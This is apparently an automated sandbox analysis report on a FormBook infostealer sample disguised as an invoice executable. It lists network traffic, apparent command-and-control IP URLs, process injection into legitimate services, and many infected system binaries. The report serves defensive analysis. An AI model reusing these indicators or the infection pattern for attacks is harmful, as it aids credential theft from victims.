      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 28 Nov 2024 11:14:11 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 28 Nov 2024 11:14:12 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
      Source: armsvc.exe, 00000002.00000002.620027406.000000000063C000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000002.620027406.0000000000655000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/nqtlxhjrub
      Source: invoice_96.73.exe, 00000000.00000002.356954240.0000000000B54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/bpewylwxymwihal
      Source: invoice_96.73.exe, 00000000.00000002.356954240.0000000000B54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/bpewylwxymwihal:
      Source: armsvc.exe, 00000002.00000003.517070722.0000000001490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
      Source: armsvc.exe, 00000002.00000003.517070722.0000000001490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
      Source: armsvc.exe, 00000002.00000003.517070722.0000000001490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
      Source: armsvc.exe, 00000002.00000003.517070722.0000000001490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
      Source: armsvc.exe, 00000002.00000003.517070722.0000000001490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
      Source: armsvc.exe, 00000002.00000003.517070722.0000000001490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
      Source: armsvc.exe, 00000002.00000003.517070722.0000000001490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
      Source: armsvc.exe, 00000002.00000003.517070722.0000000001490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
      Source: armsvc.exe, 00000002.00000003.517070722.0000000001490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
      Source: armsvc.exe, 00000002.00000003.517070722.0000000001490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
      Source: armsvc.exe, 00000002.00000003.418303558.00000000020C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: armsvc.exe, 00000002.00000003.418303558.00000000020C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
      Source: Aut2exe_x64.exe.2.drString found in binary or memory: http://www.autoitscript.com/autoit3/
      Source: armsvc.exe, 00000002.00000003.586384130.0000000001570000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.580781457.0000000001570000.00000004.00001000.00020000.00000000.sdmp, Aut2exe_x64.exe.2.drString found in binary or memory: http://www.autoitscript.com/autoit3/8
      Source: armsvc.exe, 00000002.00000003.517070722.0000000001490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
      Source: RdrServicesUpdater.exe.2.drString found in binary or memory: http://www.winimage.com/zLibDll
      Source: armsvc.exe, 00000002.00000003.535352318.00000000015A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxupdate_urlHKEY_LOCAL_MACHINE
      Source: armsvc.exe, 00000002.00000003.517070722.0000000001490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
      Source: armsvc.exe, 00000002.00000003.517070722.0000000001490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
      Source: armsvc.exe, 00000002.00000003.597459044.0000000001570000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/site/autoit/8
      Source: armsvc.exe, 00000002.00000003.517070722.0000000001490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0

      E-Banking Fraud

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000004.00000002.387515587.0000000000240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.387578097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Binary is likely a compiled AutoIt script file
      Source: invoice_96.73.exe, 00000000.00000000.345947431.00000000004AE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_484a09d7-f
      Source: invoice_96.73.exe, 00000000.00000000.345947431.00000000004AE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_f0639c96-e
      Source: invoice_96.73.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_70dc9359-2
      Source: invoice_96.73.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_d3d9a115-a
      Initial sample is a PE file and has a suspicious name
      Source: initial sampleStatic PE information: Filename: invoice_96.73.exe
      Source: C:\Users\user\Desktop\invoice_96.73.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
      Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\perfhost.exeMemory allocated: 770B0000 page execute and read and write
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\23f9eaead4df6ab2.binJump to behavior
      Source: C:\Windows\System32\msdtc.exeFile created: C:\Windows\DtcInstall.logJump to behavior
      Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Load DriverJump to behavior
      Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: SecurityJump to behavior
      Source: ehrecvr.exe.2.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
      Source: CCleaner.exe.2.drStatic PE information: Resource name: BRANDING type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Source: CCleaner64.exe.2.drStatic PE information: Resource name: BRANDING type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Source: RdrServicesUpdater.exe.2.drStatic PE information: Resource name: ZIP type: Zip archive data, at least v2.0 to extract, compression method=deflate
      Source: elevation_service.exe.2.drStatic PE information: Number of sections : 12 > 10
      Source: RdrCEF.exe.2.drStatic PE information: Resource name: CDRC type: RIFF (little-endian) data, Web/P image, VP8 encoding, 800x600, Scaling: [none]x[none], YUV color, decoders should clamp
      Source: SciTE.exe.2.drStatic PE information: Data appended to the last section found
      Source: invoice_96.73.exe, 00000000.00000003.350225262.00000000042FD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs invoice_96.73.exe
      Source: invoice_96.73.exe, 00000000.00000003.350507609.0000000004480000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs invoice_96.73.exe
      Source: invoice_96.73.exe, 00000000.00000003.346472098.0000000002A90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamearmsvc.exeN vs invoice_96.73.exe
      Source: invoice_96.73.exe, 00000000.00000003.349931866.0000000003690000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameALG.exej% vs invoice_96.73.exe
      Source: invoice_96.73.exe, 00000000.00000003.353710582.00000000037C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameaspnet_state.exeT vs invoice_96.73.exe
      Source: invoice_96.73.exe, 00000000.00000003.351198685.00000000042FD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs invoice_96.73.exe
      Source: invoice_96.73.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
      Source: invoice_96.73.exeStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: armsvc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: FlashPlayerUpdateService.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: alg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: aspnet_state.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: AcroRd32Info.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: AcroTextExtractor.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: ADelRCP.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: AdobeCollabSync.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: arh.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: WCChromeNativeMessagingHost.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: Eula.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: FullTrustNotifier.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: LogTransport2.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: 32BitMAPIBroker.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: mscorsvw.exe0.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: mscorsvw.exe1.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: dllhost.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: ehrecvr.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: ehsched.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: FXSSVC.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: elevation_service.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: ieetwcollector.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: maintenanceservice.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: msdtc.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: msiexec.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: perfhost.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: Locator.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: snmptrap.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: sppsvc.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_NOT_PAGED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: vds.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: VSSVC.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: wbengine.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: WmiApSrv.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: wmpnetwk.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: SearchIndexer.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: ose.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: setup.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: dwtrig20.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: CCleaner.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: CCleaner64.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: jabswitch.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: java-rmi.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: java.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: javacpl.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: javaw.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: javaws.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: jjs.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: jp2launcher.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: keytool.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
